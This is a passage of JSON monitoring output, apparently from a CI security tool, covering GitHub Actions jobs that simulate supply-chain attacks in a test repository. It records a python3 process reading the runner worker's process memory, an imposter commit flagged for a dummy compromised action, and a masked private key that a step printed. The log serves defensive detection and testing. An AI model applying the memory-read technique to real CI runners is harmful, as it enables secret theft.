"timestamp": "2026-03-18T06:22:42.477060054Z"
},
{
"method": "GET",
"host": "api.github.com",
"path": "/repos/step-security/dummy-compromised-action/tarball/c96c327cecdb71e8f031080ba8ad208feb25b13d",
"pid": "2936247",
"timestamp": "2026-03-18T06:22:43.92130199Z"
},
{
"method": "GET",
"host": "codeload.github.com",
"path": "/step-security/dummy-compromised-action/legacy.tar.gz/c96c327cecdb71e8f031080ba8ad208feb25b13d",
"pid": "2936247",
"timestamp": "2026-03-18T06:22:44.123908943Z"
}
]
}
]
},
{
"name": "Set up runner",
"status": "completed",
"conclusion": "success",
"ref": "",
"number": 2,
"started_at": "2026-03-18T06:22:44.7902891Z",
"completed_at": "2026-03-18T06:22:45.0259588Z",
"starting_process_pid": "2936810",
"tools": [
{
"name": "curl",
"sha256": "",
"https_endpoints": [
{
"method": "GET",
"host": "int.api.stepsecurity.io",
"path": "/v1/github/harden-runner-canary/rohan-playground/actions/policies/workflow-check?workflow=poc_workflow.yml&run_id=23231936150&correlationId=***",
"pid": "2936814",
"timestamp": "2026-03-18T06:22:44.919837064Z"
},
{
"method": "GET",
"host": "broker.actions.githubusercontent.com",
"path": "/health",
"pid": "2936247",
"timestamp": "2026-03-18T06:22:44.9485023Z"
},
{
"method": "GET",
"host": "token.actions.githubusercontent.com",
"path": "/ready",
"pid": "2936247",
"timestamp": "2026-03-18T06:22:44.956631596Z"
},
{
"method": "GET",
"host": "run.actions.githubusercontent.com",
"path": "/health",
"pid": "2936247",
"timestamp": "2026-03-18T06:22:44.962589488Z"
}
]
}
]
},
{
"name": "Pre Run step-security/harden-runner@rc-20-int",
"action": "step-security/harden-runner",
"status": "completed",
"conclusion": "success",
"ref": "rc-20-int",
"number": 3,
"started_at": "2026-03-18T06:22:45.0269588Z",
"completed_at": "2026-03-18T06:22:45.6200388Z",
"tools": [
{
"name": ".NET TP Worker",
"sha256": "",
"https_endpoints": [
{
"method": "POST",
"host": "results-receiver.actions.githubusercontent.com",
"path": "/twirp/results.services.receiver.Receiver/GetStepLogsSignedBlobURL",
"pid": "2936247",
"timestamp": "2026-03-18T06:22:45.420890237Z"
}
]
}
]
},
{
"name": "Run step-security/harden-runner@rc-20-int",
"action": "step-security/harden-runner",
"status": "completed",
"conclusion": "success",
"ref": "rc-20-int",
"number": 4,
"started_at": "2026-03-18T06:22:45.6210388Z",
"completed_at": "2026-03-18T06:22:45.8360546Z",
"starting_process_pid": "2936839"
},
{
"name": "Checkout code",
"action": "actions/checkout",
"status": "completed",
"conclusion": "success",
"ref": "v3",
"number": 5,
"started_at": "2026-03-18T06:22:45.8370546Z",
"completed_at": "2026-03-18T06:22:46.7715357Z",
"starting_process_pid": "2936846",
"tools": [
{
"name": "git-remote-http",
"sha256": "git-remote-http",
"endpoints": [
{
"domainName": "github.com",
"friendlyName": "GitHub",
"port": "443",
"timestamp": "2026-03-18T06:22:46.315407073Z",
"pid": "2936999"
}
],
"https_endpoints": [
{
"method": "GET",
"host": "github.com",
"path": "/harden-runner-canary/rohan-playground/info/refs?service=git-upload-pack",
"pid": "2936999",
"timestamp": "2026-03-18T06:22:46.408177588Z"
}
]
},
{
"name": ".NET TP Worker",
"sha256": "",
"https_endpoints": [
{
"method": "PUT",
"host": "productionresultssa11.blob.core.windows.net",
"path": "/actions-results/8adaa2ed-028f-4d96-8c73-04a0f84583da/workflow-job-run-5d4110e3-efed-5d79-85d6-621334f7f13b/logs/steps/step-logs-93fed07a-5cbd-4334-a9e2-043bbc5fc4f8.txt?se=2026-03-18T07%3A22%3A45Z&sig=***&ske=2026-03-18T08%3A57%3A35Z&skoid=***&sks=b&skt=2026-03-18T04%3A57%3A35Z&sktid=398a6654-997b-47e9-b12b-9515b896b4de&skv=2025-11-05&sp=cw&spr=https&sr=b&st=2026-03-18T06%3A22%3A40Z&sv=2025-11-05",
"pid": "2936247",
"timestamp": "2026-03-18T06:22:45.874193442Z"
},
{
"method": "POST",
"host": "results-receiver.actions.githubusercontent.com",
"path": "/twirp/results.services.receiver.Receiver/CreateStepLogsMetadata",
"pid": "2936247",
"timestamp": "2026-03-18T06:22:45.97923254Z"
},
{
"method": "PUT",
"host": "productionresultssa11.blob.core.windows.net",
"path": "/actions-results/8adaa2ed-028f-4d96-8c73-04a0f84583da/workflow-job-run-5d4110e3-efed-5d79-85d6-621334f7f13b/logs/steps/step-logs-03c8b93b-5067-448e-a8bc-97e3cfbb83f1.txt?se=2026-03-18T07%3A22%3A46Z&sig=***&ske=2026-03-18T08%3A57%3A47Z&skoid=***&sks=b&skt=2026-03-18T04%3A57%3A47Z&sktid=398a6654-997b-47e9-b12b-9515b896b4de&skv=2025-11-05&sp=cw&spr=https&sr=b&st=2026-03-18T06%3A22%3A41Z&sv=2025-11-05",
"pid": "2936247",
"timestamp": "2026-03-18T06:22:46.135941679Z"
}
]
}
]
},
{
"name": "Run step-security/dummy-compromised-action@v1",
"action": "step-security/dummy-compromised-action",
"status": "completed",
"conclusion": "success",
"ref": "v1",
"number": 6,
"started_at": "2026-03-18T06:22:46.7725357Z",
"completed_at": "2026-03-18T06:22:46.8348168Z",
"starting_process_pid": "2937010"
},
{
"name": "Post Checkout code",
"status": "completed",
"conclusion": "success",
"ref": "",
"number": 10,
"started_at": "2026-03-18T06:22:46.8358168Z",
"completed_at": "2026-03-18T06:22:47.274652Z",
"starting_process_pid": "2937038"
},
{
"name": "Post Run step-security/harden-runner@rc-20-int",
"status": "completed",
"conclusion": "success",
"ref": "",
"number": 11,
"started_at": "2026-03-18T06:22:47.275652Z",
"completed_at": "2026-03-18T06:22:47.4706905Z",
"starting_process_pid": "2937129",
"tools": [
{
"name": ".NET TP Worker",
"sha256": "",
"https_endpoints": [
{
"method": "PUT",
"host": "productionresultssa11.blob.core.windows.net",
"path": "/actions-results/8adaa2ed-028f-4d96-8c73-04a0f84583da/workflow-job-run-5d4110e3-efed-5d79-85d6-621334f7f13b/logs/steps/step-logs-f95db143-e6e7-46e0-af3a-062092452a6e.txt?se=2026-03-18T07%3A22%3A47Z&sig=***&ske=2026-03-18T08%3A57%3A10Z&skoid=***&sks=b&skt=2026-03-18T04%3A57%3A10Z&sktid=398a6654-997b-47e9-b12b-9515b896b4de&skv=2025-11-05&sp=cw&spr=https&sr=b&st=2026-03-18T06%3A22%3A42Z&sv=2025-11-05",
"pid": "2936247",
"timestamp": "2026-03-18T06:22:47.373457568Z"
}
]
}
]
},
{
"name": "Complete runner",
"status": "completed",
"conclusion": "success",
"ref": "",
"number": 12,
"started_at": "2026-03-18T06:22:47.4716905Z",
"completed_at": "2026-03-18T06:22:47.6875614Z",
"starting_process_pid": "2937149",
"tools": [
{
"name": "curl",
"sha256": "",
"https_endpoints": [
{
"method": "GET",
"host": "int.api.stepsecurity.io",
"path": "/v1/github/harden-runner-canary/rohan-playground/actions/runs/23231936150/correlation/arc0-6l5vf-runner-5npvd/job-markdown-summary?environment=ARC",
"pid": "2937150",
"timestamp": "2026-03-18T06:22:47.558197671Z"
},
{
"method": "PUT",
"host": "productionresultssa11.blob.core.windows.net",
"path": "/actions-results/8adaa2ed-028f-4d96-8c73-04a0f84583da/workflow-job-run-5d4110e3-efed-5d79-85d6-621334f7f13b/logs/steps/step-logs-a9d484ac-e63c-4c59-b79c-55176b819313.txt?se=2026-03-18T07%3A22%3A47Z&sig=***&ske=2026-03-18T08%3A57%3A27Z&skoid=***&sks=b&skt=2026-03-18T04%3A57%3A27Z&sktid=398a6654-997b-47e9-b12b-9515b896b4de&skv=2025-11-05&sp=cw&spr=https&sr=b&st=2026-03-18T06%3A22%3A42Z&sv=2025-11-05",
"pid": "2936247",
"timestamp": "2026-03-18T06:22:47.620800259Z"
}
]
}
]
},
{
"name": "Complete job",
"status": "completed",
"conclusion": "success",
"ref": "",
"number": 13,
"started_at": "2026-03-18T06:22:47.6885614Z",
"completed_at": "2026-03-18T06:22:47.6939516Z"
}
],
"is_sudo_process": false,
"is_sudo_feature_enabled": false,
"runner_name": "arc0-6l5vf-runner-5npvd",
"runner_machine_group": "default",
"runner_machine_name": "arc0-6l5vf-runner-5npvd",
"harden_runner_egress_policy": "audit",
"harden_runner_disable_telemetry": "false",
"harden_runner_disable_file_monitoring": "false",
"cluster_name": "rohan-test-v5",
"environment_type": "ARC",
"has_raw_file_events": true,
"has_raw_process_events": true,
"raw_file_events_key": "correlate_runs/harden-runner-canary/rohan-playground/23231936150-events/67527154571/file_events.json",
"raw_process_events_key": "correlate_runs/harden-runner-canary/rohan-playground/23231936150-events/67527154571/process_events.json",
"raw_events_bucket": "customer-raw-events-data-277233109775",
"actions_info": [
{
"action": "step-security/harden-runner",
"tag": "rc-20-int",
"sha": "b458cf61e24e167c05a441dec5234b240974af45",
"timestamp": "1773814960",
"is_imposter_commit": false,
"is_commit_on_default_branch": false
},
{
"action": "actions/checkout",
"tag": "v3",
"sha": "f43a0e5ff2bd294095638e18286ca9a3d1956744",
"timestamp": "1773814962",
"is_imposter_commit": false,
"is_commit_on_default_branch": true
},
{
"action": "step-security/dummy-compromised-action",
"tag": "v1",
"sha": "c96c327cecdb71e8f031080ba8ad208feb25b13d",
"timestamp": "1773814963",
"is_imposter_commit": true,
"is_commit_on_default_branch": false
}
],
"suspicious_processes_control_enabled": true,
"labels": [
"arc0"
],
"runner_group_name": "default",
"runner_group_id": 1,
"correlation_id": "arc0-6l5vf-runner-5npvd"
},
{
"id": 67527154575,
"run_id": 23231936150,
"html_url": "https://github.com/harden-runner-canary/rohan-playground/actions/runs/23231936150/job/67527154575",
"status": "completed",
"conclusion": "success",
"started_at": "2026-03-18T06:22:03Z",
"completed_at": "2026-03-18T06:22:15Z",
"name": "tj-actions-simulation",
"steps": [
{
"name": "Set up job",
"status": "completed",
"conclusion": "success",
"ref": "",
"number": 1,
"started_at": "2026-03-18T06:22:04.8453472Z",
"completed_at": "2026-03-18T06:22:09.8785879Z",
"tools": [
{
"name": "/home/runner/bin/Runner.Worker",
"sha256": "/home/runner/bin/Runner.Worker",
"endpoints": [
{
"domainName": "api.github.com",
"friendlyName": "GitHub",
"port": "443",
"timestamp": "2026-03-18T06:22:05.756737317Z",
"pid": "2932480"
}
]
}
]
},
{
"name": "Set up runner",
"status": "completed",
"conclusion": "success",
"ref": "",
"number": 2,
"started_at": "2026-03-18T06:22:09.8795879Z",
"completed_at": "2026-03-18T06:22:10.115038Z",
"starting_process_pid": "2932796"
},
{
"name": "Pre Run step-security/harden-runner@rc-20-int",
"action": "step-security/harden-runner",
"status": "completed",
"conclusion": "success",
"ref": "rc-20-int",
"number": 3,
"started_at": "2026-03-18T06:22:10.116038Z",
"completed_at": "2026-03-18T06:22:10.5367303Z"
},
{
"name": "Run step-security/harden-runner@rc-20-int",
"action": "step-security/harden-runner",
"status": "completed",
"conclusion": "success",
"ref": "rc-20-int",
"number": 4,
"started_at": "2026-03-18T06:22:10.5377303Z",
"completed_at": "2026-03-18T06:22:10.7069931Z",
"starting_process_pid": "2932830"
},
{
"name": "Checkout",
"action": "actions/checkout",
"status": "completed",
"conclusion": "success",
"ref": "v4",
"number": 5,
"started_at": "2026-03-18T06:22:10.7079931Z",
"completed_at": "2026-03-18T06:22:11.6123638Z",
"starting_process_pid": "2932837",
"tools": [
{
"name": "/usr/lib/git-core/git-remote-https",
"sha256": "/usr/lib/git-core/git-remote-https",
"endpoints": [
{
"domainName": "github.com",
"friendlyName": "GitHub",
"port": "443",
"timestamp": "2026-03-18T06:22:11.167531717Z",
"pid": "2932940"
}
]
}
]
},
{
"name": "Execute tj-action",
"status": "completed",
"conclusion": "success",
"ref": "",
"number": 6,
"started_at": "2026-03-18T06:22:11.6133638Z",
"completed_at": "2026-03-18T06:22:11.6725493Z",
"starting_process_pid": "2932952",
"tools": [
{
"name": "/usr/bin/python3",
"sha256": "/usr/bin/python3",
"armour_events": [
{
"armour_event_kind": "FILE_READ",
"timestamp": "2026-03-18T06:22:11.644742552Z",
"file_info": {
"is_write": false,
"current_pid": 2932959,
"current_exe": "/usr/bin/python3",
"target_file": "/proc/2932480/mem",
"target_pid": 2932480,
"target_exe": "/home/runner/bin/Runner.Worker"
},
"enforced_protection": false
}
]
}
]
},
{
"name": "Post Checkout",
"status": "completed",
"conclusion": "success",
"ref": "",
"number": 10,
"started_at": "2026-03-18T06:22:11.6735493Z",
"completed_at": "2026-03-18T06:22:12.058536Z",
"starting_process_pid": "2932960"
},
{
"name": "Post Run step-security/harden-runner@rc-20-int",
"status": "completed",
"conclusion": "success",
"ref": "",
"number": 11,
"started_at": "2026-03-18T06:22:12.059536Z",
"completed_at": "2026-03-18T06:22:12.231328Z",
"starting_process_pid": "2933058"
},
{
"name": "Complete runner",
"status": "completed",
"conclusion": "success",
"ref": "",
"number": 12,
"started_at": "2026-03-18T06:22:12.232328Z",
"completed_at": "2026-03-18T06:22:12.3950445Z",
"starting_process_pid": "2933065"
},
{
"name": "Complete job",
"status": "completed",
"conclusion": "success",
"ref": "",
"number": 13,
"started_at": "2026-03-18T06:22:12.3960445Z",
"completed_at": "2026-03-18T06:22:12.4026298Z"
}
],
"is_sudo_process": false,
"is_sudo_feature_enabled": false,
"runner_name": "arc0-6l5vf-runner-q9ln7",
"runner_machine_group": "default",
"runner_machine_name": "arc0-6l5vf-runner-q9ln7",
"harden_runner_egress_policy": "audit",
"harden_runner_disable_telemetry": "false",
"harden_runner_disable_file_monitoring": "false",
"cluster_name": "rohan-test-v5",
"environment_type": "ARC",
"has_raw_file_events": true,
"has_raw_process_events": true,
"raw_file_events_key": "correlate_runs/harden-runner-canary/rohan-playground/23231936150-events/67527154575/file_events.json",
"raw_process_events_key": "correlate_runs/harden-runner-canary/rohan-playground/23231936150-events/67527154575/process_events.json",
"raw_events_bucket": "customer-raw-events-data-277233109775",
"actions_info": [
{
"action": "step-security/harden-runner",
"tag": "rc-20-int",
"sha": "b458cf61e24e167c05a441dec5234b240974af45",
"timestamp": "1773814925",
"is_imposter_commit": false,
"is_commit_on_default_branch": false
},
{
"action": "actions/checkout",
"tag": "v4",
"sha": "34e114876b0b11c390a56381ad16ebd13914f8d5",
"timestamp": "1773814928",
"is_imposter_commit": false,
"is_commit_on_default_branch": false
}
],
"suspicious_processes_control_enabled": true,
"suspicious_processes": {
"runnerWorkerMemoryReadProcesses": [
{
"pid": "2932959",
"exe": "/usr/bin/python3",
"timestamp": "2026-03-18T06:22:11.644742552Z",
"armour_event_process": {
"armour_event_kind": "FILE_READ",
"timestamp": "2026-03-18T06:22:11.644742552Z",
"file_info": {
"is_write": false,
"current_pid": 2932959,
"current_exe": "/usr/bin/python3",
"target_file": "/proc/2932480/mem",
"target_pid": 2932480,
"target_exe": "/home/runner/bin/Runner.Worker"
},
"enforced_protection": false
}
}
]
},
"labels": [
"arc0"
],
"runner_group_name": "default",
"runner_group_id": 1,
"correlation_id": "arc0-6l5vf-runner-q9ln7"
},
{
"id": 67527154576,
"run_id": 23231936150,
"html_url": "https://github.com/harden-runner-canary/rohan-playground/actions/runs/23231936150/job/67527154576",
"status": "completed",
"conclusion": "success",
"started_at": "2026-03-18T06:22:27Z",
"completed_at": "2026-03-18T06:22:38Z",
"name": "handle-private-key",
"steps": [
{
"name": "Set up job",
"status": "completed",
"conclusion": "success",
"ref": "",
"number": 1,
"started_at": "2026-03-18T06:22:28.5106076Z",
"completed_at": "2026-03-18T06:22:30.9131911Z",
"tools": [
{
"name": "/home/runner/bin/Runner.Worker",
"sha256": "/home/runner/bin/Runner.Worker",
"endpoints": [
{
"domainName": "api.github.com",
"friendlyName": "GitHub",
"port": "443",
"timestamp": "2026-03-18T06:22:29.324173621Z",
"pid": "2934641"
}
]
},
{
"name": ".NET TP Worker",
"sha256": "",
"https_endpoints": [
{
"method": "GET",
"host": "results-receiver.actions.githubusercontent.com",
"path": "/_ws/ingest.sock",
"pid": "2934641",
"timestamp": "2026-03-18T06:22:29.087572574Z"
},
{
"method": "POST",
"host": "launch.actions.githubusercontent.com",
"path": "/actions/build/8adaa2ed-028f-4d96-8c73-04a0f84583da/jobs/44e7d063-d136-52a7-8d24-1fefbb3162cf/runnerresolve/actions",
"pid": "2934641",
"timestamp": "2026-03-18T06:22:29.087999634Z"
},
{
"method": "POST",
"host": "results-receiver.actions.githubusercontent.com",
"path": "/twirp/github.actions.results.api.v1.WorkflowStepUpdateService/WorkflowStepsUpdate",
"pid": "2934641",
"timestamp": "2026-03-18T06:22:29.179615282Z"
},
{
"method": "GET",
"host": "api.github.com",
"path": "/repos/step-security/harden-runner/tarball/b458cf61e24e167c05a441dec5234b240974af45",
"pid": "2934641",
"timestamp": "2026-03-18T06:22:29.348526345Z"
},
{
"method": "GET",
"host": "codeload.github.com",
"path": "/step-security/harden-runner/legacy.tar.gz/b458cf61e24e167c05a441dec5234b240974af45",
"pid": "2934641",
"timestamp": "2026-03-18T06:22:29.549089563Z"
},
{
"method": "GET",
"host": "api.github.com",
"path": "/repos/actions/checkout/tarball/f43a0e5ff2bd294095638e18286ca9a3d1956744",
"pid": "2934641",
"timestamp": "2026-03-18T06:22:30.111202973Z"
},
{
"method": "GET",
"host": "codeload.github.com",
"path": "/actions/checkout/legacy.tar.gz/f43a0e5ff2bd294095638e18286ca9a3d1956744",
"pid": "2934641",
"timestamp": "2026-03-18T06:22:30.326326014Z"
}
]
}
]
},
{
"name": "Set up runner",
"status": "completed",
"conclusion": "success",
"ref": "",
"number": 2,
"started_at": "2026-03-18T06:22:30.9141911Z",
"completed_at": "2026-03-18T06:22:31.1498563Z",
"starting_process_pid": "2935385",
"tools": [
{
"name": ".NET TP Worker",
"sha256": "",
"https_endpoints": [
{
"method": "GET",
"host": "token.actions.githubusercontent.com",
"path": "/ready",
"pid": "2934641",
"timestamp": "2026-03-18T06:22:30.9837199Z"
},
{
"method": "GET",
"host": "run.actions.githubusercontent.com",
"path": "/health",
"pid": "2934641",
"timestamp": "2026-03-18T06:22:31.006519077Z"
},
{
"method": "GET",
"host": "broker.actions.githubusercontent.com",
"path": "/health",
"pid": "2934641",
"timestamp": "2026-03-18T06:22:31.009246479Z"
},
{
"method": "GET",
"host": "int.api.stepsecurity.io",
"path": "/v1/github/harden-runner-canary/rohan-playground/actions/policies/workflow-check?workflow=poc_workflow.yml&run_id=23231936150&correlationId=***",
"pid": "2935389",
"timestamp": "2026-03-18T06:22:31.031260764Z"
}
]
}
]
},
{
"name": "Pre Run step-security/harden-runner@rc-20-int",
"action": "step-security/harden-runner",
"status": "completed",
"conclusion": "success",
"ref": "rc-20-int",
"number": 3,
"started_at": "2026-03-18T06:22:31.1508563Z",
"completed_at": "2026-03-18T06:22:31.5792719Z",
"tools": [
{
"name": ".NET TP Worker",
"sha256": "",
"https_endpoints": [
{
"method": "POST",
"host": "results-receiver.actions.githubusercontent.com",
"path": "/twirp/results.services.receiver.Receiver/GetStepLogsSignedBlobURL",
"pid": "2934641",
"timestamp": "2026-03-18T06:22:31.491983477Z"
}
]
}
]
},
{
"name": "Run step-security/harden-runner@rc-20-int",
"action": "step-security/harden-runner",
"status": "completed",
"conclusion": "success",
"ref": "rc-20-int",
"number": 4,
"started_at": "2026-03-18T06:22:31.5802719Z",
"completed_at": "2026-03-18T06:22:31.7957799Z",
"starting_process_pid": "2935445"
},
{
"name": "Checkout code",
"action": "actions/checkout",
"status": "completed",
"conclusion": "success",
"ref": "v3",
"number": 5,
"started_at": "2026-03-18T06:22:31.7967799Z",
"completed_at": "2026-03-18T06:22:32.8241564Z",
"starting_process_pid": "2935459",
"tools": [
{
"name": ".NET TP Worker",
"sha256": "",
"https_endpoints": [
{
"method": "PUT",
"host": "productionresultssa11.blob.core.windows.net",
"path": "/actions-results/8adaa2ed-028f-4d96-8c73-04a0f84583da/workflow-job-run-44e7d063-d136-52a7-8d24-1fefbb3162cf/logs/steps/step-logs-89a26c00-266f-4fef-929e-336d5cc02d45.txt?se=2026-03-18T07%3A22%3A31Z&sig=***&ske=2026-03-18T08%3A57%3A28Z&skoid=***&sks=b&skt=2026-03-18T04%3A57%3A28Z&sktid=398a6654-997b-47e9-b12b-9515b896b4de&skv=2025-11-05&sp=cw&spr=https&sr=b&st=2026-03-18T06%3A22%3A26Z&sv=2025-11-05",
"pid": "2934641",
"timestamp": "2026-03-18T06:22:31.958248645Z"
},
{
"method": "POST",
"host": "results-receiver.actions.githubusercontent.com",
"path": "/twirp/results.services.receiver.Receiver/CreateStepLogsMetadata",
"pid": "2934641",
"timestamp": "2026-03-18T06:22:32.078417769Z"
},
{
"method": "PUT",
"host": "productionresultssa11.blob.core.windows.net",
"path": "/actions-results/8adaa2ed-028f-4d96-8c73-04a0f84583da/workflow-job-run-44e7d063-d136-52a7-8d24-1fefbb3162cf/logs/steps/step-logs-73ba7c51-7cf6-4b17-9b8c-ad7ecb534636.txt?se=2026-03-18T07%3A22%3A32Z&sig=***&ske=2026-03-18T08%3A58%3A27Z&skoid=***&sks=b&skt=2026-03-18T04%3A58%3A27Z&sktid=398a6654-997b-47e9-b12b-9515b896b4de&skv=2025-11-05&sp=cw&spr=https&sr=b&st=2026-03-18T06%3A22%3A27Z&sv=2025-11-05",
"pid": "2934641",
"timestamp": "2026-03-18T06:22:32.341618748Z"
}
]
},
{
"name": "git-remote-http",
"sha256": "git-remote-http",
"endpoints": [
{
"domainName": "github.com",
"friendlyName": "GitHub",
"port": "443",
"timestamp": "2026-03-18T06:22:32.181895036Z",
"pid": "2935633"
}
],
"https_endpoints": [
{
"method": "GET",
"host": "github.com",
"path": "/harden-runner-canary/rohan-playground/info/refs?service=git-upload-pack",
"pid": "2935633",
"timestamp": "2026-03-18T06:22:32.284135713Z"
}
]
}
]
},
{
"name": "Decode and print private key",
"status": "completed",
"conclusion": "success",
"ref": "",
"number": 6,
"secrets": [
{
"secret": "----*******************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************************--",
"line_number": "14",
"rule_id": "private-key",
"step_number": "6"
}
],
"started_at": "2026-03-18T06:22:32.8251564Z",
"completed_at": "2026-03-18T06:22:32.9182631Z",
"starting_process_pid": "2935836"
},
{
"name": "Post Checkout code",
"status": "completed",
"conclusion": "success",
"ref": "",
"number": 10,
"started_at": "2026-03-18T06:22:32.9192631Z",
"completed_at": "2026-03-18T06:22:33.4562277Z",
"starting_process_pid": "2935859"
},
{
"name": "Post Run step-security/harden-runner@rc-20-int",
"status": "completed",
"conclusion": "success",
"ref": "",
"number": 11,
"started_at": "2026-03-18T06:22:33.4572277Z",
"completed_at": "2026-03-18T06:22:33.6389824Z",
"starting_process_pid": "2936026"
},
{
"name": "Complete runner",
"status": "completed",
"conclusion": "success",
"ref": "",
"number": 12,
"started_at": "2026-03-18T06:22:33.6399824Z",
"completed_at": "2026-03-18T06:22:33.9371427Z",
"starting_process_pid": "2936090",
"tools": [
{
"name": ".NET TP Worker",
"sha256": "",
"https_endpoints": [
{
"method": "PUT",
"host": "productionresultssa11.blob.core.windows.net",
"path": "/actions-results/8adaa2ed-028f-4d96-8c73-04a0f84583da/workflow-job-run-44e7d063-d136-52a7-8d24-1fefbb3162cf/logs/steps/step-logs-496887fc-932d-4678-97b2-9d78ba1212fe.txt?se=2026-03-18T07%3A22%3A33Z&sig=***&ske=2026-03-18T08%3A58%3A08Z&skoid=***&sks=b&skt=2026-03-18T04%3A58%3A08Z&sktid=398a6654-997b-47e9-b12b-9515b896b4de&skv=2025-11-05&sp=cw&spr=https&sr=b&st=2026-03-18T06%3A22%3A28Z&sv=2025-11-05",
"pid": "2934641",
"timestamp": "2026-03-18T06:22:33.701901656Z"
},
{
"method": "GET",
"host": "int.api.stepsecurity.io",
"path": "/v1/github/harden-runner-canary/rohan-playground/actions/runs/23231936150/correlation/arc0-6l5vf-runner-7hq8w/job-markdown-summary?environment=ARC",
"pid": "2936091",
"timestamp": "2026-03-18T06:22:33.817187879Z"
}
]
}
]
},
{
"name": "Complete job",
"status": "completed",
"conclusion": "success",
"ref": "",
"number": 13,
"started_at": "2026-03-18T06:22:33.9381427Z",
"completed_at": "2026-03-18T06:22:33.9452435Z"
}
],
"is_sudo_process": false,
"is_sudo_feature_enabled": false,
"runner_name": "arc0-6l5vf-runner-7hq8w",
"runner_machine_group": "default",
"runner_machine_name": "arc0-6l5vf-runner-7hq8w",
"harden_runner_egress_policy": "audit",
"harden_runner_disable_telemetry": "false",
"harden_runner_disable_file_monitoring": "false",
"cluster_name": "rohan-test-v5",
"environment_type": "ARC",
"has_raw_file_events": true,
"has_raw_process_events": true,
"raw_file_events_key": "correlate_runs/harden-runner-canary/rohan-playground/23231936150-events/67527154576/file_events.json",
"raw_process_events_key": "correlate_runs/harden-runner-canary/rohan-playground/23231936150-events/67527154576/process_events.json",
"raw_events_bucket": "customer-raw-events-data-277233109775",
"actions_info": [
{
"action": "step-security/harden-runner",
"tag": "rc-20-int",
"sha": "b458cf61e24e167c05a441dec5234b240974af45",
"timestamp": "1773814949",
"is_imposter_commit": false,
"is_commit_on_default_branch": false
},
{
"action": "actions/checkout",
"tag": "v3",
"sha": "f43a0e5ff2bd294095638e18286ca9a3d1956744",
"timestamp": "1773814950",
"is_imposter_commit": false,
"is_commit_on_default_branch": true
}
],
"suspicious_processes_control_enabled": true,
"labels": [
"arc0"
],
"runner_group_name": "default",
"runner_group_id": 1,
"correlation_id": "arc0-6l5vf-runner-7hq8w"
},
{
"id": 67527154577,
"run_id": 23231936150,
"html_url": "https://github.com/harden-runner-canary/rohan-playground/actions/runs/23231936150/job/67527154577",
"status": "completed",
"conclusion": "success",
"started_at": "2026-03-18T06:22:27Z",
"completed_at": "2026-03-18T06:22:37Z",
"name": "pytorch-simulation",
"steps": [
{
"name": "Set up job",
"status": "completed",
"conclusion": "success",
"ref": "",
"number": 1,
"started_at": "2026-03-18T06:22:28.4112145Z",
"completed_at": "2026-03-18T06:22:30.7528434Z",
"tools": [
{
"name": "/home/runner/bin/Runner.Worker",
"sha256": "/home/runner/bin/Runner.Worker",
"endpoints": [
{
"domainName": "api.github.com",
"friendlyName": "GitHub",
"port": "443",
"timestamp": "2026-03-18T06:22:29.218690572Z",
"pid": "2934633"
}
]
},
{
"name": ".NET TP Worker",
"sha256": "",
"https_endpoints": [
{
"method": "GET",
"host": "results-receiver.actions.githubusercontent.com",
"path": "/_ws/ingest.sock",
"pid": "2934633",
"timestamp": "2026-03-18T06:22:28.986799895Z"
},
{
"method": "POST",
"host": "launch.actions.githubusercontent.com",
"path": "/actions/build/8adaa2ed-028f-4d96-8c73-04a0f84583da/jobs/5068cffc-cd6c-567c-8307-64fcecbbad9f/runnerresolve/actions",
"pid": "2934633",
"timestamp": "2026-03-18T06:22:28.990800991Z"
},
{
"method": "POST",
"host": "results-receiver.actions.githubusercontent.com",
"path": "/twirp/github.actions.results.api.v1.WorkflowStepUpdateService/WorkflowStepsUpdate",
"pid": "2934633",
"timestamp": "2026-03-18T06:22:29.071602888Z"
},
{
"method": "GET",
"host": "api.github.com",
"path": "/repos/step-security/harden-runner/tarball/b458cf61e24e167c05a441dec5234b240974af45",
"pid": "2934633",
"timestamp": "2026-03-18T06:22:29.241036135Z"
},
{
"method": "GET",
"host": "codeload.github.com",
"path": "/step-security/harden-runner/legacy.tar.gz/b458cf61e24e167c05a441dec5234b240974af45",
"pid": "2934633",
"timestamp": "2026-03-18T06:22:29.445361671Z"
},
{
"method": "GET",
"host": "api.github.com",
"path": "/repos/actions/checkout/tarball/34e114876b0b11c390a56381ad16ebd13914f8d5",
"pid": "2934633",
"timestamp": "2026-03-18T06:22:29.94780365Z"
},
{
"method": "GET",
"host": "codeload.github.com",
"path": "/actions/checkout/legacy.tar.gz/34e114876b0b11c390a56381ad16ebd13914f8d5",
"pid": "2934633",
"timestamp": "2026-03-18T06:22:30.144326166Z"
}
]
}
]
},
{
"name": "Set up runner",
"status": "completed",
"conclusion": "success",
"ref": "",
"number": 2,
"started_at": "2026-03-18T06:22:30.7538434Z",
"completed_at": "2026-03-18T06:22:31.0482229Z",
"starting_process_pid": "2935378",
"tools": [
{
"name": ".NET TP Worker",
"sha256": "",
"https_endpoints": [
{
"method": "GET",
"host": "broker.actions.githubusercontent.com",
"path": "/health",
"pid": "2934633",
"timestamp": "2026-03-18T06:22:30.876681312Z"
},
{
"method": "GET",
"host": "run.actions.githubusercontent.com",
"path": "/health",
"pid": "2934633",
"timestamp": "2026-03-18T06:22:30.904356778Z"
},
{
"method": "GET",
"host": "token.actions.githubusercontent.com",
"path": "/ready",
"pid": "2934633",
"timestamp": "2026-03-18T06:22:30.910334613Z"
},
{
"method": "GET",
"host": "int.api.stepsecurity.io",
"path": "/v1/github/harden-runner-canary/rohan-playground/actions/policies/workflow-check?workflow=poc_workflow.yml&run_id=23231936150&correlationId=***",
"pid": "2935382",
"timestamp": "2026-03-18T06:22:30.932036045Z"
}
]
}
]
},
{
"name": "Pre Run step-security/harden-runner@rc-20-int",
"action": "step-security/harden-runner",
"status": "completed",
"conclusion": "success",
"ref": "rc-20-int",
"number": 3,
"started_at": "2026-03-18T06:22:31.0492229Z",
"completed_at": "2026-03-18T06:22:31.405226Z",
"tools": [
{
"name": ".NET TP Worker",
"sha256": "",
"https_endpoints": [
{
"method": "POST",
"host": "results-receiver.actions.githubusercontent.com",
"path": "/twirp/results.services.receiver.Receiver/GetStepLogsSignedBlobURL",
"pid": "2934633",
"timestamp": "2026-03-18T06:22:31.349950534Z"
}
]
}
]
},
{
"name": "Run step-security/harden-runner@rc-20-int",
"action": "step-security/harden-runner",
"status": "completed",
"conclusion": "success",
"ref": "rc-20-int",
"number": 4,
"started_at": "2026-03-18T06:22:31.406226Z",
"completed_at": "2026-03-18T06:22:31.6334573Z",
"starting_process_pid": "2935438"
},
{
"name": "Checkout",
"action": "actions/checkout",
"status": "completed",
